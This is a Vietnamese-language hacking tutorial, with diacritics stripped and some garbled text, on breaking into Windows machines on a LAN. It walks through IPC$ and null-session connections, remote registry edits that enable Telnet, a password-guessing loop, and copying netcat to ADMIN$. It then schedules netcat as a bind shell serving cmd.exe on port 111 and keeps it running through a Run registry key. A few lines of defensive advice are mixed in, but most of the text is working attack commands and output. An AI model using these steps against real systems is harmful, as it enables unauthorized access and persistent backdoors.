Professional Documents
Culture Documents
Bi 1:
Hack computer trong LAN. Khng c g mi m trong cch xm nhp nhng nhiu ngi s dng
my tnh trong LAN vn mc phi,
Bi ny mnh vit vi mong mun cho cc bn thy rng hacker c th s dng mi th xm nhp
my tnh ngay c nhng iu mnh ngh l n gin nht
ch tn cng
Tn my tnh: victim
a ch IP: 192.168.1.3
H iu hnh: Windows Server 2003
Bc 1: u tin ta kt ni n ipc$ s dng lnh sau:
Code:
c:\net use \\victim\ipc$ /u:administrator
Bc 2: M registry v kt ni thao tc Registry vi my tnh victim bng cch
Code:
Start-->Run g regedit [enter]
Trong mi trng Registry Editor. Chn Connect Network Registry
Nhp tn my tnh cn thao tc Registry t xa. y l victim
Bc3:
Sau khi kt ni thnh cng n Registry ca victim ta n
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer
Thay i gi tr NTLM =0 disable NTLM
Bc 4:
S dng MMC khi ng Telnet t my victim
Bc 5: Kt ni n my victim
Code:
c:\telnet victim
Khi login vo c my victim ri th vic tip theo phi lm g khi c shell th chc mnh khi phi ni
tip
.
M dch v Telnet ch lm mt trong nhng cch m hacker s dng truy nhp vo my victim.
Trng hp khc c th m Remote Desktop, ...etc
Qua y cho ta thy rng nn disable nhng dch v khng cn thit v khng Administrator rng
hoc t mt khu Administrator qu n gin, ...etc
Ch cn mt s h nh i vi my tnh ca mnh th my tnh ca mnh c th b xm hi.
r hn cc bn c th ti video demo HACK LAN
Bi 2:
Bi th 2 mnh mun trnh by vi cc bn k thut Sniff Password s dng Cain & Abel.
Cain & Abel l mt trong nhng cng c ng trong top cc cng c v security. Cc bn c th ti
phin bn mi nht ti http://oxid.netsons.org/download/ca_setup.exe
Hin ti mnh s dng phin bn Cain & Abel v4.9.3
Cain & Abel v4.9.3 released
New features:
- Added Windows Mail (Vista) Password Decoder for POP3, IMAP, NNTP, SMTP and LDAP accounts.
- Added PTW WEP cracking attack.
CODE
C:\> FOR /F %i IN (1,1,254) DO nat u userlist.txt p passlist.txt x.x.x.x.%I>>output.txt
i vi Win 2000,XP hacker s khng l g nu khng phi administrator chnh v vy hacker bng
mi gi s ly cho c administrator.
nu ly c admin th vic cn li th ch hacker nh ot.
Khuyn co : khng nn share g ht ( trong trng hp buc phi share th nn t password phc
tp 1 cht )
Gi s rng my ca Victim khng share. Vy hacker lm sao ?
Trong trng hp ny hacker s on user & pass (c th dng cch trn hoc dung cc tool nh:
user2sid/sid2user,dumpACL,SMBGrind) sau kt ni ti IPC$ ( mc nh share ca windows)
CODE
C:\> net use \\x.x.x.x\IPC$ password /user:administrator
The command completed successfully.
Trong trng hp khng th on c user & pass hacker c th thit lp mt Null session ti my
victim:
CODE
C:\> net use \\x.x.x.x\IPC$ /user:
The command completed successfully
V ri nu victim permission khng ng s c nhng hu qu khn lng.
khuyn co : V hiu ho NetBios ( Bm vo My Network Places chn Local Area Connetion, chn
TCP/ IP sau bm vo propperties chn Advandce, chn WINS v bm vo Disable NetBIOS over
TCP / IP), Dng firewall chn 1 s port khng cn thit , kho ti khon sau 1 s ln ng nhp tht
bi .
Tin y cng ni thm v iu khin t xa ( v c nhiu bn t nhp c vo ri m khng bit
phi lm sao )
Gi s rng bn c username,password ca admin ca my victim ri:
gi thit lp 1 phin lm vic:
CODE
C:\> net use \\x.x.x.x\IPC$ password /user:administrator
The command completed successfully.
Sau ta cn copy backdoor iu khin my victim c rt nhiu loi backdoor nhng ti thy hn
c vn l : netcat ( nc)
chp nc vo my victim
CODE
C
:\>copy nc.exe \\x.x.x.x\ADMIN$\nc.exe
The command completed successfully.
1 file copies
Chy service Schedule trn my victim ( c service ny mi thc thi c cc file trn my victim,
mc inh khi ci win s chy service ny)
CODE
C:\> sc \\x.x.x.x start schedule
service_name : schedule
By gi kim tra gi trn my victim
CODE
C:\> net time \\x.x.x.x
Current time at \\10.0.0.31 is 6/29/2005 4:50 AM
The command completed successfully.
By gi chy netcat ch n lng nghe cng 111:
CODE
C:\>AT \\x.x.x.x 4:55 /interactive c:\windows\nc.exe L d p111 e cmd.exe
Added a new job with job ID = 1
i n 4:55 ri chy th nc.exe
CODE
C:\>nc nvv x.x.x.x 111
(UNKNOWN) [x.x.x.x] 111 (?) open
Microsoft Windows XP [Version 5.1.2600]
Copyright 1985-2001 Microsoft Corp.
C:\windows>
By gi lm g th tu nha ( nhng ng c ph hoi ngi ta nhe)
Vn l lm sao cho nhng ln sau victim bt my tnh ln netcat t ng chy v lng nghe mnh
lnh ca ta?
Bn c th cho netcat khi ng cng windows. "moi" file netcat.reg (dng notepad v save li
thnh .reg) c ni dung nh sau:
CODE
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run]
"netcat"="\"C:\\nc\\nc.exe\" -L -d -p111 -e cmd.exe"
Sau copy sang my victim v chy nha!
Hy vng mi ngi ng ph hoi nha ! Thn
Tc gi: ZENO-HVAOnline
Bi 4: Phng php c bn t nhp trong Lan
Link: http://www.kmasecurity.net/xforce/thao-luan-chung-ve-hacking/1573-phuong-phap-co-ban-dedot-nhap-trong-lan.html
(su tm)
1- Kim tra IPC share: IPC vit tt ca Inter-Process Communication, c dng trong vic chia s
d liu gia cc ng dng v my tnh trn mng